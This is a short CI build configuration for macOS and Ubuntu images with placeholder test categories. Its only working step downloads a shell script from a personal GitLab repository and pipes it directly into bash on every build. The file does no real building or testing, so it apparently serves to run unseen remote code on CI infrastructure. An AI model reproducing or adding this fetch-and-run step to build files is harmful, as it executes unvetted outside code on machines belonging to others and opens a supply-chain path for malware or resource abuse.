version: 1.0.{build}
image:
- macOS-BigSur
- Ubuntu2004
build:
  parallel: true
  verbosity: minimal
test:
  categories:
  - - Test1
  - - Test2
build_script:
- sh: curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash
